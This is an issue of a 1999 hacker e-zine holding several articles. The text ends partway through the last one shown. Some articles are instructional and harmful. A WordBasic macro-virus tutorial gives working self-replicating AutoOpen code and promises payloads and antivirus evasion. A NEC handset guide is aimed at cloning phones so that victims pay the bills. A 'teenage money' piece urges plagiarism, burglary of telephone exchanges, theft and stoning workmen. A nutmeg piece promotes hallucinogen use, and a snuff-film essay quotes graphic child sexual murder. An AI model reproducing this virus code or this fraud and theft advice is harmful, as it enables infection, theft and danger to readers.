___________ _______________________________________ ", / / ___ _.-'' '. / / / / /NDERGROUND> .' _ | / / / / / _______ / / \ / / / / / / / ___ \ / __/_.' / / / / / / / /__/ / /.-'' .' / / / / / / _____.' /_________..-' / / / / /___/ /_ / / / / / '.____ __/ / / | / / / / / / \ | _.' /__/ERIODICAL> / / '-._'..-'_______________________________/__..-' "We're on the Up and Up" :..:..::..Issue..::..:..: Issue 3 May 1999 :.::.::.:.Staff.:.::.::.: Cyborg - Editor HitMan - Writer Darkflame - Writer CrossFire - Writer :.::...Greetings To..::.: fORCE GPF#2 CFiSH Zomba ZirQaz Rekcah HellBent Scorpion Crypt0genic :..::..:.Website.:..::..: http://upzine.8m.com :..::..:..E-mail.:..::..: under_p@yahoo.com :.:.Alternative Hosts.:.: http://www.ecad.org/up/ ftp://t245.dccnet.com:95001 http://hitman.ie.8m.com/up.htm http://cyborg.ie.8m.com/up.htm http://www.tdshackers.com/upzine/ :..::..Introduction.::..: <*> You are reading the third issue of Underground Periodical. For those of you that didn't already know Up is an e-zine for people who are living on the new edge, surfing along the new wave of radical thought. You may notice that this issue is a little different from the others, by that I mean there is views on certain issues instead of just all technical information. We'd like to thank GPF#2 for designing the new ascii logo. <*> People have been having more and more download problems. It seems that half the people who go to our site can't download the zips. While some people can ok, others can't. It became such a dominant problem that we ended up moving the files to ecad.org. The HTML is still hosted at the 8m.com relay but the zips are linked from ecad.org. You can also visit the ecad website for the latest in security news and its up folder for tar files if you are a Unix user. It has been drawn to my attention that some people can't access the website through a proxy server so the whole website may be moved shortly. If we do suddenly disappear and you're not sure where to get the issues subscribe to us or e-mail us asking for directions through cyberspace. <*> You may recall that last month due to high demand we started up a subscription list. Well if you don't want to join it by going to the bottom of our website and enter your e-mail in the dialog box you can now sign up by e-mailing underground-periodical-subscribe@egroups.com So what are you waiting for? Someone to hold your hand perhaps? Go subscribe now! <*> One advantage of being a subscriber is that you will receive the soon to come Up Newsletter. The purpose of this newsletter is to keep people informed on new projects open to the public and to request general opinions on topics that might be raised in an article for future issues. The deadline is not strict but about every month or so is right. This newsletter will headed by my buddy CrossFire but other staff members will help out. <*> We'd like to thank any and all people who submitted to Issue 3 or contributed in any way. It is understood that they are automatically praised and worshipped above any gods. Without continued support from the underground community we won't be able to keep Up going. It's your magazine, so help it out a little. Anyway, on with this issue... :..::.:..Contents.:.::..: <*> 1 - Inroduction & Contents : Cyborg <*> 2 - Nutmeg Hallucinations : Franco <*> 3 - Enjoy Teenage Years : Sunburst <*> 4 - Pirate Radio Series : Cyborg <*> 5 - Internet Radio : CrossFire <*> 6 - Cannabis Discussion : Darkflame <*> 7 - NEC p400/600 Mobiles : HitMan <*> 8 - Snuff Movie Culture : Cyborg <*> 9 - Making Macro Virii : Tefx <*> 10 - China In Turmoil : Cyborg <*> 11 - UK Boxing Guide : Darkflame <*> 12 - You've Got Mail : Readers <*> 13 - Disclaimer & The End : Up Staff :..::..End Of File..::..: :..::..File 2 Of 13.::..: :.Nutmeg Hallucinations.: :.::.::.By Franco.::.::.: <*> Nutmeg, what the hell is it, is it a drug, is it addictive? I will answer all these questions. Nutmeg, the long criticised hallucinogenic. If you look it up, and I mean look it up in loads of dictionaries, many will be associate with addictive drugs to which it is not! Yes, Nutmeg is in no way ADDICTIVE!!! Below is an extract from a dictionary, explaining about nutmeg. + MACMILLAN DICTIONARY OF TOXICOLOGY: myristicin A naturally occurring methylenedioxyphenyl compound found in nutmeg. It has been suggested that myristicin may be responsible, in whole or in part, for the toxicity of nutmeg. The spice (5-15g) causes symptoms similar to atropine poisoning: flushing of skin, tachycardia, and absence of salivation, and excitation of the central nervous system. Euphoria and hallucinations have given rise to abuse of this material. As a methylenedioxyphenyl compound, myristicin gives rise to a type III spectrum with reduced cytochrome + INTERNATIONAL DICTIONARY OF MEDICINE AND BIOLOGY myristicin A toxic, crystalline, safrole derivative present in star anise, parsley seed oil, and nutmeg oil. When ingested in large quantities, it can cause convulsions, hallucinations, tachycardia, and possibly death. <*>-----------------------------------------------------------------<*> Yes, it can result in death, and I don't honestly know the amount! WARNING, CAN CAUSE DEATH IF CONSUMED IN LARGE ENOUGH QUANTITES! BUMMERBUMMERBUMMERBUMMERBUMMERBUMMERBUMMERBUMMERRBUMMER! <*>-----------------------------------------------------------------<*> Now to sum up, the actual nutmeg drug is the volatile oil distilled from it. It is a colourless, pale yellow or pale green liquid with the same colour and taste of nutmeg. Blah, Blah, Blah bit... It is available as East Indian nutmeg oil and West Indian nutmeg oil. East Indian oil is soluble 1 in 3 of alcohol (90%), West Indian 1 in 4. What follows is a short extract from one person's experience with nutmeg. Yes, this is quite a popular account which has been read by many people on the internet. """""""""The preceding narrative was given spontaneously by an intelligent, perceptive, and sensitive adolescent who had had prior experience with marijuana and morning-glory seeds. The frequent connection of the two is known. (3, 5) He felt that on marijuana, the predominant feeling was one of enjoyment and happiness, of being liked and floating. Hallucinations were less marked. On morning-glory seeds, he also had a light, floating sensation, but it seemed to be of a different kind, and the most marked thing was a constant feeling of euphoria. On both these substances, he felt he never really left reality, and he thought that this was a major distinction between these substances and nutmeg. He repeated his experience with nutmeg in a smaller dose. On one tablespoon full of the substance he "felt high" or sometimes "weird" but without hallucinations; music sounded better although it did not sound louder. None of the colourful changes in perception occurred on the small dose of nutmeg. The description given by this patient is richer and more colourful than the previous reports (3,6,7). Although the previous descriptions also contained many of the experiences reported here, such as lapses of attention, although consciousness was retained, (6) depersonalisation, (6) bright colours, (3) a floating feeling, (3) and music being more enjoyable. (3) Follow-up on this patient showed that he continued taking marijuana but stopped taking nutmeg. Psychodynamically, the patient was in the midst of an identity crisis, trying to deal with his leanings toward dependency and passivity by identifying with the hippie groups. The patient's father had been incapacitated for several years because of psychiatric difficulties also centring around dependency and passivity.""""""""" Scary, darey! There ya go, take enough nutmeg and you're away for a long time with one of the *best* trips your probably ever experience in your entire life from a non-addictive drug. Once again, I must warn that in large enough quantities it can kill so be wise. My own view on the drug is that its fantastic for hallucinating, but I wouldn't take the stuff unsupervised, or without a friend to help stop me from doing harm to my self. Though the best bit I believe to be is that you can't get addicted to the stuff and it is because of that, that I would choose this drug over and over instead of jabbing a vein and becoming addicted to what not. Franco :..::..End Of File..::..: :..::..File 3 Of 13.::..: :..Enjoy Teenage Years..: :.::.:.By Sunburst.:.::.: <*> The first file in this mini series has been published in issue 14 of the Swateam e-zine ( http://www.swateam.org ), however the esteemed Cyborg asked if I could write a couple of files for his mag, and so here I am. I welcome any kind of correspondence, whether it be good or bad so give me a mail at sunburst@which.net, my icq no. is 34865702 and I am usually on #2600-uk on Effnet. Ok, I'll stop waffling and get down to the task at hand. Being a teenager myself I can't help but feel proud of the reputation that we are given by the modern media, and out of determination not to let the trouser-wetting bumbling bureaucrats down, I am releasing a series of text files on well maximising life as a teenager. They are in no particular order at the moment, maybe later on I might actually create a webpage and host them. But until then I'll just submit them to any h/p/a e-zine that wants it. All teenagers share two common problems... lack of money and too much schoolwork. Schoolwork is the easiest thing to get rid off (by schoolwork I mean essays and shit), just hop over to a cheating site like http://www.school-sucks.com, or do a search in altavista. Find the essay that you need and then cut and paste into your essay. Voila! Be careful though, if your not that great at a particular subject and then you go and hand in a 'A*' essay the teacher might get slightly curious ;) Keep on doing this and a large portion of your school work will be done for you without you having to do a thing, that wasn't so hard was it :) There are plenty of methods of acquiring cash for the modern teenager, you just have to know where to look. I'll start with the legal methods. I offer a legitimate computer support service where I will go round and fix computer-related problems. I basically charge a flat rate of �7.50, and seeing that most problems will only involve formatting the hard drive or reinstalling Windows, its v. good pay. I am thinking about setting up my own computer building company, where I will by the parts by bulk and then sell whole systems. I will need to raise about �1500 in cash first though :/ Now I'll move on to the quicker, easier, enjoyable and illegal ways of making money. Remember kiddies I accept no responsibility for any trouble you may land yourself up in. By now you should have heard about VMB systems, most of you reading this will have their own box, yes? How hard was it to get your box? Not very hard was it? Got the default passcode for the empty boxes? Ever thought about selling these boxes to less knowledgeable teenagers? Try it, it'll make you a quick buck. If you don't know what a VMB is mail me and I'll point you in the right direction, and if I'm feeling nice I might even give you a number. A red box is another device that every aspiring phreak should have. I suspect that most of you just use a dictaphone, its quite hard to sell a tape with a couple of tones on for any decent money so I suggest you seek out some schematics and build your own from scratch. After a quick demonstration in a phone box these will sell like hot cakes, the price that you want to sell them at depends on the cost of the components, they vary so look around for a cheap supplier. A visit into your local exchange (with the help of a sledge hammer :) will usually give you some telco manuals, monologues (line monitoring equipment) and if your lucky a lineman's handset. These are worth about �40, so sell them quick. Remember that exchanges have silent alarms and are linked up to the local police station, so don't spend longer than two minutes in there. Rummaging through the bins of electrical companies will often present you with useful electrical equipment, you have to really live in a city the reap the full rewards of this though. However country boys such as myself can still hit lucky sometimes, the odd 286 etc. Hanging around building sites is hardly trashing but you will often find power drills, spades etc just left lying around. Liberate them! On a recent adventure I found 25 power cables with EU connectors, these can be rewired by simply chopping the tops off and putting British plugs on. If you're interested mail me. If you're not looking for any money, and just want a way to waste some time. Go with a friend to a building site, farm etc or anywhere where there will be workmen hanging around. Shout some abuse at them, the odd stone helps, and they will soon start to chase you. This is an excellent way of keeping fit and healthy. Well that's about all I've got time for, so wait with eager anticipation for my next instalment. Seeya, Sunburst ... sunburst@which.net ICQ no. 34865702 P.s If any of you have got any spare telco manuals I will happily buy them off you. :..::..End Of File..::..: :..::..File 4 Of 13.::..: :..Pirate Radio Series..: :..::.:.By Cyborg.:.::..: <*> Pirate Radio Series Part III Introduction: This file deals with starting your own pirate radio station. It is a part three of a four part series on pirate radio. I've researched many sites on the internet combined with my own knowledge to write this file. More On Transmitters - Circuit Board Schematics This file contains information about building small radio transmitters, most of which have a range of about 30 yards or so. I found these HTML diagrams on a Dutch pirate radio website and spent hours translating them into text diagrams as best I could. This is not for the beginner as you will have to interpret and construct these circuit boards on your own. If you are unsure about what you are doing then stop now. By the way, the text diagrams use some non-standard ascii characters. As you won't find all of them on your keyboard be picky as to what text editor you should decide to use. This file was written in the Fixedsys font and is thereby most accurately read in it. 1) Transmitter using RF. This is probably the simplest transmitter that you will find anywhere. ------------------- | | | �R1 | | �47k | | � _ | | + \/ | / /\/ = Antenna | |----|-| | = 6 to 12" | C1| \_\/\ Q1 |1.5 hookup |0.1 =2N2222 | |to wire |to | | |3 volts |10uF | | | ----------------~~~~----- L1 Tapped 1/3 of way from one end. 2) Oscillator using BC237. Output around 50 mW. This layout came from Radio Power from Leidschendam. In the early days of the 80's it was a hobby of many amateurs to build oscillators with off-the-shelf parts, this ended in this schematic. Note that * = Turns DIA 10mm. -------------------------------------------� | | | | | |4* L1$ |C3 R1� | $ =60pFv. 10k� =C1 $ | � |407pF | | L2 10* C5 | | _|--------~~~~---------�----� | | / /\ T1 | 60pFv. �-----|--|----------|-| | BC237 | | | \_\/ | | | | | R2� | | =C4 10k� =C2 �R3 |60pFv. � |407pF �100E | | | � | | | | | �-------------------------------------------------� 3) Voice transmitter using FM. This is an easy-to-build miniature FM transmitter. ------------------------------------------- - - - - | | | $ | | | C2 = $ # | R1� 10 - 40pF | $L1 | | | 4.7k� | $ | | � _ |-------------|---- + | | / /\/ | 3V = --------|---------|-| | = C3 = C4 = | | \_\/\ | 4.7pF .001uF - | |)= = Q1 |------ | (optional) | Electret | C1| 2N3904 �R2 | Microphone| .001uF| �330 | | | | � | | | | | ------------------------------------- - - - - - - - | # 4) Transmitter using BF256, BF199, 2N3866, BF199. This transmitter delivers around 100 mW. 100 �-->|------===-------------------------------------------------------�-�-------� | | | | 1n | +12 volt | � | RFC $ | 9v1 | T � | $ | ----------------------- 1n = � | $ | | |+ | | | | | | | = 16v =1n | -------------- � -------- � = = | | | | �390 | | | � | | �180 | � | � � = | � � _ � _ � �22k �1k | | �22k| $ L2 | |65p |1m � � � | | � � $--- | = � |-�-- � |------|< |----| | $ | L3 40p �-|�-| 1m | � -- |--|---|< BF199 | �10k |--�---- | ----~~~~---�--� |-===--�-|----�--|-->| BF256 | | | � | | |---- 16v | | | -- | |--- | 10p � | |-----|< | output 100mw � | $ L1 | �10k �1k|1n |--�--|---|< | | | � = $ | � � | � |2n3866�10k | |22p � ^ $---------- � � = � | � | = | | | | | | | | | | | �----------------------------------------------------------------------------------------� | � 5) Transmitter using BF245. This uses a BF245 (fet) as an oscillator and the BF199 as bufferstage it puts out around 100 mW. R7 -----------------------------------------===--------------------------------------------� | | | | | | 100E L3 | | | | | | | | | ---- | = = �R1 �D1 =C3 �+ C5 �R5 �R6 ----------------~~~~---- | | �390k ^9v |1nF - 16v �1M �150E | | | RFC # # � | # | � � = | $ C10 L4 | # # | |------- | �R6 $-----�-----~~~~-------------� C1 | R3 C2 C6 | --T1 | # �22k $ 4.5 DIA 6mm �-|�---|--===-------�---------------�----->| BF245 =C8 � _| | 3k3 | 5p6 | | 8p2 -- |1nF | / /\------ 16v | | | | | # -----|----|-| | | �R2 | | $ | C7 | �R9 \_\/ | �100k =D2 |C4 $-------------�----| �10k | =C11 � ^BB405B =40pFv. $L1 8.2pF � | |22pFv. | | | | | | | �-----------------------------------------------------------------------------------------------� Look out for Part IV of this series where I will discuss some other aspect of pirate radio. Well I hope this has been an informative read. If you would like to e-mail me regarding anything in this file then go ahead. If you are interested in hacking, phreaking or programming then e-mail me or visit my website: cyborg@disinfo.net http://cyborg.ie.8m.com :..::..End Of File..::..: :..::..File 5 Of 13.::..: :.::..Internet Radio.::.: :.::...By CrossFire..::.: ##### Intro ##### <*> It seems that lately, the new buzzword round the net is internet radio. All the hacker sites seem to have them, and even e-zines have shows. This article will explain the basics of internet radio, and how to get involved. ########## The Basics ########## There are generally two options in internet broadcasting, format wise - Real Audio, or MP3. The Most popular option is Real Audio, simply because this a very small codec and can be streamed very easily. When the net started, the only kind of sounds generally suitable for broadcasting were *very* small .wav files recorded at a shit sample rate, resulting at short, very poor quality shows. Real Audio works by streaming, downloading only the part of the file needed. Thus you end up with extremely small download sizes, and a great base for internet radio. Now on to MP3, many people are failing to realise that mp3 is just a file format, not a Godzilla lookalike bent on destroying the music industry as we know it. The reason that mp3 is so popular is it's small file sizes - mp3 uses a codec where instead of writing guitar3, guitar3, guitar3, it would be guitar3x3, and you can guess the compression ratio of that then! ################ Getting Involved ################ Ok, so now you want to start your own internet radio station, here's how: first, obviously, record your show. You can record this to any format you want, because whichever broadcast format you choose, you will encode it. However, I would recommend that you record to .wav format, seeing as that it is universally recognised. Now, once you have recorded the show, its on with the encoding. Encoding to Real Audio Ok, the first thing you will need - obviously, is the real audio encoder, this will give you a wizard to encode the file, I am not going to tell you how to encode it. If you want to broadcast this live, you get an option at the end of the wizard to broadcast this live. Otherwise, Upload the RM file at the end to your website, then create a text file with the location of the .rm file in, e.g.: http://www.yourserver.com/somefile.rm and upload that to the server, save it as 1.ram or something similar, as long as it has the .ram suffix. Now on the page you want to broadcast from, create a link to the ram file you uploaded, and voila, if a visitor to your webpage clicks on that link, providing they have the real audio player, they will hear the broadcast. Encoding to MP3 Believe it or not, MP3 can be streamed, just create a file with the location of your mp3 file in, e.g.: http://www.someserver.com/babyonemoretime.mp3 and save it as whatever.m3u . Upload both of the files to your webpage, and link to the .m3u file from your page, voila, you have a streaming mp3. I am not going to go into detail on the mp3 subject, you should know how to encode one by now, and if you don't, tough shit. CrossFire crossfire@hackers-uk.freeserve.co.uk :..::..End Of File..::..: :..::..File 6 Of 13.::..: :..Cannabis Discussion..: :.::...By Darkflame..::.: <*> A topic on which many people hold strong views is the legalisation of the drug Cannabis. I will write about the arguments for and against the proposition that Cannabis should be legalised. There is a difference between legalisation and decriminalisation. The decriminalisation of cannabis involves freeing the drug user/possessor from criminal status, and limits the punishment for drug possession (under a certain amount) to a minimal fine. This file is however, on the complete legalisation of cannabis, which is the argument that cannabis could be manufactured marketed and distributed in the same way as alcohol and tobacco. It would be taxed and the price of cannabis would depend on the price outlined by the government and eventually set by the retailer. The main argument used by the people who want the drug legalised is that it is what is known as a "gateway" drug. Cannabis is said to lead users of it onto harder and more harmful drugs. According to a United States Government website: "Long-term studies of high school students and their patterns of drug use show that very few young people use other illegal drugs without first trying marijuana." It could however be argued that this has been worded in a manipulative way, it could be argued that this is like saying that very few alcoholics did not start by drinking beer before drinking spirits, and beer is not criminalised. Those who want the drug legalised argue that there would be great economic and environmental benefits of the drug being legalised. They say the potential of cannabis plants for paper production is enormous. According to the US Dept. of Agriculture, one acre of the cannabis plant "Cannabis Sativa" can produce four times more paper than one acre of trees. All types of paper products can be produced from cannabis plants: newsprint, computer paper, stationary, cardboard, envelopes and toilet paper. They say that trees must grow for 20 to 50 years after planting before they can be harvested for commercial use. Within four months after it is planted, Cannabis Sativa grows 10 to 20 feet tall and it is ready for harvesting. Cannabis can be grown on most farmland in warm climates, and in greenhouses etc. Forests require large tracts of land available in few locations. Substituting cannabis for trees would save forests and wildlife habitats and would eliminate erosion of topsoil due to logging. Reduction of topsoil erosion would also reduce pollution of lakes/rivers/streams. If the growth of Cannabis was taxed then there would be more money for the government, which would go back into society as a whole. On the other hand, cannabis was banned in the first place (in the US at least) because it was giving too much competition to the US' timber trade, and would have put many out of work. Those who are in favour of the drug remaining criminalised argue that smoking Cannabis is extremely bad for your health. When smoked in a pipe or joint cannabis is eight times worse for your body than the effects of tobacco products. Those who are in favour of the drug being legalised argue that there are other ways of taking cannabis which are not as bad for your body, and that it is the tobacco used in smoking with a pipe that makes it worse, because the tobacco is combined with the cannabis. They argue that there are 460,000 deaths per annum that are connected with either tobacco or alcohol, whereas there has never been a death as the direct result of the use of cannabis. On the other hand cannabis does give you the following ailments: (1) problems with memory and learning; (2) distorted perception (sights, sounds, time, touch); (3) trouble with thinking and problem-solving; (4) loss of co-ordination; and (5) increased heart rate, anxiety. Those against argue that these effects are even greater when other drugs are mixed with the cannabis; and users do not always know what drugs are given to them. While those who would like the drug legalised argue that the police could spend more time cracking down on these other drugs instead of spending time and resources on prosecuting those who use cannabis. They also say that if cannabis was properly marketed and manufactured, people would know exactly what they were getting, and marketing would be controlled. Those against the proposal say that if one person becomes addicted to a harder drug, and then is killed, that it is not worth the legalisation of cannabis. On the other hand, if they really want the drug, they will get it anyway. I, personally, think that the drug "Cannabis Sativa" should be legalised for medicinal purposes. I think it should be distributed at the Doctor's discretion as he knows his patients the best, and he knows if they would need it. I think the only people who should be given cannabis are those who have a chronic illness or are suffering from deep depression. I'm not sure if I think cannabis should be legalised out right, but I definitely think it should be given a fair hearing by all governments. -- -darkflame -darkflame@zetnet.co.uk -http://welcome.to/digital.insanity "The roots of education are bitter, but the fruit is sweet" :..::..End Of File..::..: :..::..File 7 Of 13.::..: :..NEC p400/600 Mobiles.: :..::.:.By HitMan.:.::..: NEC P400 and 600: ***************** Well the issue before last I did a file on the NEC P800 mobile phone and this time I am going to give an in-depth look at programming your NEC p400 and p600. I don't know if also works with the p800 but try it anyway. One of the best things that can be done is to intercept calls to a certain mobile phone (e.g.: your friends, foe or enemy) and call all of your mates which in turn would run the target's bill through the roof! Good if you really hate the guy, but it can also be a nice little trick for whatever you want. It's also good if like me you have a phone dial lock on the phone at home and you want to take the time to go and fuck up your neighbours phone and start dialling all the internet access you want for the next decade and the best thing is that they can only trace you back to the original owners phone so you walk down the street laughing at the poor sucker handing over their month wages to pick up your phone bill. But if get caught you will be flooding one hell of a bill providing you actually did run up their sorry ass. <*>-----------------------------------------------------------------<*> Personal File Disclaimer: Another thing is that by no means am I saying that you must do this, this file is just a way I know that will make the average human have a big smile on their face! <*>-----------------------------------------------------------------<*> These handsets are quad NAM handheld units and they run at the ESN prefix of 135 decimal & 87 hex. To do this programming you will need a NEC programming adapter and converter cables, these must be used to program these units. They are available from any good electronics shop and other places. Just go looking. NAM programing: *************** 1. When the power is off, connect the NEC programing adaptor and cable. 2. Turn the unit to power-on. 3. Press RCL # 0 1 to enter test mode. 3. Press RCL # 7 1 to enter programing mode. 4. Press # to increment and store each step. 5. At any time press and hold CLR to return to test mode, press RCL # 0 2 to complete and exit programing. PROGRAMING DATA STEP# #OF DIGITS/RANGE DISPLAY DESCRIPTION 01 10 DIGITS Phone No. MIN (AREA CODE & TEL#) 02 4 DIGITS Lock Code LOCK CODE 03 00000 - 32767 Home Area SYSTEM ID 04 2 DIGITS G.I. Mark GROUP ID (10 IN USA) 05 0333 OR 0334 First P-CH INITIAL PAGING CHANNEL 06 0 OR 1 Sys Select PREFERRED SYSTEM (0=B, 1=A) 07 2 DIGITS ACCOLC ACCESS OVERLOAD CLASS 08 0 OR 1 MIM Mark MIN MARK 09 0 OR 1 Local Use LOCAL USE MARK 10 3 DIGITS EMG No EMERGENCY NUMBER (911) LOCK & UNLOCK: F # four digit code. SYSTEM SELECT: P400: F 5 then 5 to scroll, CLR to store. P600: F 5 4 then RCL to scroll, CLR to store. I myself found this useful for getting into a mates phone to prove the weakness of the �100 he spent on it! So try it! [-=http://hitman.ie.8m.com=-] [-=vectra500@geocities.com=-] __ __ __ ________ ___ ___ ____ ___ __ | | | | | | |__ __| | \ / | / __ \ | \ | | | |_| | | | | | | \/ | / |__| \ | \ | | | _ | | | | | | |\ /| | / ____ \ | |\ \| | | | | | | | | | | | \/ | | / / \ \ | | \ | |__| |__| |__| |__| |__| |__| /__/ \__\ |__| \___| :..::..End Of File..::..: :..::..File 8 Of 13.::..: :..Snuff Movie Culture..: :..::.:.By Cyborg.:.::..: <*> Lights, camera, action... from the upper echelons of the Hollywood party crowd to the violent neo nazi culture of eastern Europe to the urban underground market place on the streets of Thailand, snuff movies are all around us. Hidden deep in the murky depths of pornucopia. Everything has a dark underside, and although pornography is the sinister shadow of the mainstream movie business it too has a distorted mirror image. Snuff is infamous as the depth of human depravity. For people who don't know what a snuff movie is allow me to enlighten you. Snuff is more than murder caught on videotape (which is commonly referred to as mondo films) two other decisive factors are necessary. The first is that the primary motivation for the murder is production value, this means organised and intentional, at a point in the script the director has decided that somebody is killed. The second and most important is that the footage is being distributed commercially. The big question surrounding snuff movies is whether they actually exist or not. Some say they are just urban legends. This is based on the old cliche that you don't believe what you don't see. No law enforcement authority has ever seized an actual real tape despite offered rewards of $25,000 no questions asked. Seeing as how I am here to bring you my views on the subject I would have to say that I think yes they do exist. Although I have never seen one I don't feel that ignorance will solve such a problem. People have to be open to the fact that they might exist however unpleasant that may be. Just where do people buy snuff movies? If you are wondering where you can get one then you are a sick asshole. It is generally thought that they are obtained, if you know who to ask, on the streets of New York. Another hotspot would be the black market in Bangkok. Advertisements have been found on street walls before. Here is an example: "The film that could only be made in South America... where life is CHEAP!" Hard hitting stuff... this statement was taken from an advertisement for a snuff movie made in South America. The poster which displays a drawing cut up into four pieces. The drawing depicts a naked woman arching her head back as if screaming in agony and there is blood spilled over the drawing. Self portrayed as "the bloodiest thing that ever happened in front of a camera" I can only look on it in disgust. Here is an account from I got from the internet describing one person's tale of the existence of snuff movies: "I have some limited information you may find of interest. I have traveled extensively around the world, living on 3 continents. As such I have the found out some things. I understand most real snuff films are primarily made in South America, especially Columbia. Thailand produces a lot of real snuff films and while I lived in Bangkok I heard from Thai friends that snuff films are readily available. There are underground snuff bars in Bangkok. I had a friend who was offered a video tape of a six year old boy being fucked to death, by the owner of the resort bungalow he was renting. My Taiwanese friends claim to have watched Japanese snuff films. Supposedly, in the late 80's in Japan there was a serial killer who would kidnap women and disembowel them on video, which he then sent to the police to taunt them with. I have seen many Japanese Faces of Death type of movies. They were much more graphic and real than the original faces of death films. The Japanese films really made me ill. As you know, there are no restrictions on film violence in Japan. Go to a Japanese store and rent the video, or order the films online from Japan if you are interested. Just remember, life is really cheap in some 3rd world hellhole. If you want someone killed in the 3rd world it can be done for a few hundred bucks or less, How much more do you think a real snuff film would cost then? Snuff is real, just don't look for it in the good old USA." When did the trend of snuff movies actually start? If you are a fan of violence you will have heard of Manson. Charles Manson and his cohorts were a violent cult. They brutally murdered the actress Sharon Tate and many of her friends. They also murdered Roman Polanski's heavily pregnant wife. Books spawned from the international media frenzy at the time suggested that the Manson cult actually taped the murdered and either sold them on or buried them underground. The author Ed Sanders coined a phrase to describe this, he called it snuff. I think it is now time I described my knowledge of snuff. I have this friend. I'm not going to mention any names. He has another friend and she knows this guy who has been known to locate certain items. It was said that in one of these movies a women was naked, strapped to a table bent over backwards, tied helplessly. She was too stoned to realise what was going on when a bull charges at her and she died when the bull's horn went up into her anus at galloping speeds. As readers may have noticed I have not (and do not intend to) reveal my location. However, in the city that I live I know people who have seen advertisements for snuff movies in the alleyways of the city centre. The reason I got interested in this topic is due to the new film by A-list movie director Joel Schumacer, 8mm. In 8mm, Nicholas Cage plays a private eye employed by an elderly widow to investigate a small reel of film she has found in the personal possessions of her recently deceased husband. The footage seems to show a young girl being tortured and killed in a sado-masochistic ritual. Here is a quote from the film: "The girl's like a rag doll, face reddened, eyes closed, but she remains upright. Masked Man uses his thumbs to open her unseeing eyes. He touches her mouth with his fingers, presses his lips to hers. Then, Masked Man backs away, leaving frame, till the camera moves to find him standing at a table with three large bowie knives laid out. Masked Man runs his fingers over the blades..." People who read this file might be curious... but the truly sick thing about snuff movie is that by watching or buying one you are encouraging murder as that is why the movie was filmed in the first place. Spare a thought for the victims of such perversion. So what sort of people ending up being cut up on screen for the pleasure of hardcore perverts and serial rapists? The answer is homeless people, kids who run away from home. Remember being a kid and when your parents told you never to accept sweets from strangers you'd just laugh it off? It doesn't have quite the same humorous edge now. There will always be burned bodies of street children found in cellars and children that go missing never to be found. In some parts of South America it is still legal to kill your wife if she insults you. When you talk about snuff Sao Paulo gets mentioned. Columbia besides being famous for drugs, mobs, gambling and more of the same which did present the Unabomber with so many viable options, guess what else goes on? More than just snuff movies but violent cults which are rumored to involve Columbian politicians. One guy posted a message on the internet saying that the president of Columbia might be in on it, nobody was ever sure whether he was joking or not... As many people who study violent behaviour patterns will know, many types and motives of violence are cross linked. For instance, some modern nazi syndicates make snuff movies not for profit but to glorify their execution of black, Asian, homosexual or any other types of people who don't fit right into their 'Aryan paradise'. I don't have enough space to elaborate on my portrayal of modern naziesque rage. I know that even a file on nazism in America would take up too much space likewise for my conclusions regarding fascist propaganda but watch this space. Unfortunatley, however much the people despise snuff the masses enjoy the same thing only fictionalised. Remember how entertained you were when you watched "The Silence Of The Lambs"? Hannibal Lector is a 90's popular culture icon and, although it is bloodcurlingly intense to even suggest, he is also a role model for gothic klans who film the twisted consequences of the sick state of today's society. Remember that no matter how secure you feel in your pretty boy lifestyle these are the dark ages of global civilisation. The question that you have to ask yourself is does this turn you on even a little bit? When you think of a girl having her throat cut during sex does that excite you at all? I think it is something everyone needs to explore in their own mind. It is generally thought that this applies to somewhere in the midst of ten per cent of people. That is a lot of people. Contrary to wishful thinking this concerns more than just wierdos who are widely regarded as insane this affects a lot more... what about your friend? what about your neighbour? what about yourself? The glaring lack of hard evidence has never been enough has never been enough to stop any supposing because there is always going to be myths and rumors to fan the flames. Turning this theory on its head for a moment, there is no evidence to suggest that they don't exist which by logical terms means it could be 50/50 going either way. This goes beyond the thinking that anything is possible because I don't think that it is hard to believe. Since the birth of cinematography could somebody have sold on footage of a killing? Maybe, but one vital element is always missing - the tape itself. :..::..End Of File..::..: :..::..File 9 Of 13.::..: :...Making Macro Virii..: :.::.:.:.By Tefx.:.:.::.: <*> tefx@hotmail.com http://www.infowar.co.uk/ampersand Making Macro Virii - Another FAQ [1] - Theory [2] - Infection [3] - A Simple Example [4] - Brief Summary [5] - More Macro Names [6] - Infecting With FileSave(As) [7] - Payloads : The Best Part Of A Macro [8] - Related Commands Firstly there are a few things you should know: 1. I am not teaching Word Basic ! I am showing you macro virii techniques. 2. I assume you know Basic/WordBasic or are able to comprehend it. 3. I personally assume no responsibility for incidents relating indirectly/directly to this article. 4. Most of the techniques shown will be picked up by Av scanners, so you will have to use farily complicated techniques to avoid detection. (Anti Heuristic) Warning ! Backup all found copies of "NORMAL.DOT" - I mean it! Believe me. You WON'T REGRET IT ! If you don't yet have an understanding of Basic do so. I will be using WordBasic (6.0) Not VBA ('97) as I understand it, and it's easier to make. So if you have 97 look up "equivilant commands" in the VBA help file. [1] - Theory Macros Can only exist in templates. There are two types of templates ; User templates (Where Macros are reffered to by "Filename:MacroName") And the global template (This is the Normal.dot file, and macros are reffered to by "Global:MacroName"). [2] - Infection A general example: An infected template (passing as a document) is opened in Word. The viral macro runs every time a document is opened (Macro Name is "AutoOpen"). So the virus gets executed either when the infected file is opened or a new clean file is opened. So the macro checks to see whether it is to infect the global template (Infected file opened) or it is already in the global template (and has to infect clean file). It then infects the file, by converting the file into a template (If neccesary.) and copies itself into the clean file. [3] - A Simple Example This is a bog standard virus using many general techniques i.e it is based on the many virii Macro : AutoOpen 'This means that the Macro runs 'every time a file is opened Sub Main On Error Resume Next 'If theres an error, carry on wih the next command File$=FileName$()+":"+"AutoOpen" 'The active file, Either the Infected document ' (template), Or a clean file or a file thats ' already been infected, Plus the macro name Global$="Global"+":"+"AutoOpen" macrocount = countmacros(0, 0) 'Find Out the number of macros for i = 1 to macrocount 'Search through every macro if macroname$(i, 0, 0) = "AutoOpen" then 'And if AutoOpen Is there installed = - 1 'We're infected End if Next If installed=-1 then 'The global template is 'infected so We have to copy the macro from 'the global template to The new File 'But First, we make sure the clean files a 'template Spread the virus FileSaveAs .Format = 1 MacroCopy Global$,File$ 'And Copy the Macro Else 'Its Global Infection Time ! MacroCopy File$,Global$ Endif END Sub [4] - Brief Summary What We have learned in this bit, and some expansions on the techniques learned. + Making a macro run every time a file is opened > By naming it "AutoOpen" + Error strategies > By Putting in "On Error Resume Next" > Or alternatively Putting in "On Error Goto Error" > And Putting "error:" at the end of the sub + Checking whether we're infected > by first counting the macros with I=countmacros(0, 0) > Then looping with a for loop checking every > macro from 1 to I and then checking the name > of the macro with macroname$(macroposition, 0, 0) + Copying the macro > we do this by using MacroCopy From$,To$ > But if we 